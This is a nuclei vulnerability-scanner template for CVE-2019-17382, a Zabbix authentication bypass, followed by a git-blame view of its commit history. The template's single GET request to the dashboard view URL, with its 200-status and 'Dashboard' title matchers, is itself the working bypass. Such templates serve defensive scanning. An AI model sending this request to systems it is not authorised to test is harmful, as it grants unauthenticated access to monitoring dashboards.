nuclei-templates/cves/2019/CVE-2019-17382.yaml

id: CVE-2019-17382

info:
  name: Zabbix Authentication Bypass
  author: Harsh Bothra
  severity: critical
  # source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382

requests:
  - method: GET
    path:
      - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<title>Dashboard</title>"
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-17382`
Create CVE-2019-17382.yaml Zabbix Authentication Bypass to access Dashboard 2020-07-07 04:17:27 +00:00
			`info:`
			`name: Zabbix Authentication Bypass`
			`author: Harsh Bothra`
uniform format 2020-08-31 18:34:29 +00:00			`severity: critical`
adding matchers-condition when we are looking to match two condition, we should add matchers-condition, as the default check is OR which will results into false positive results. 2020-07-07 06:26:01 +00:00			`# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382`
Create CVE-2019-17382.yaml Zabbix Authentication Bypass to access Dashboard 2020-07-07 04:17:27 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'`

adding matchers-condition when we are looking to match two condition, we should add matchers-condition, as the default check is OR which will results into false positive results. 2020-07-07 06:26:01 +00:00			`matchers-condition: and`
Create CVE-2019-17382.yaml Zabbix Authentication Bypass to access Dashboard 2020-07-07 04:17:27 +00:00			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "<title>Dashboard</title>"`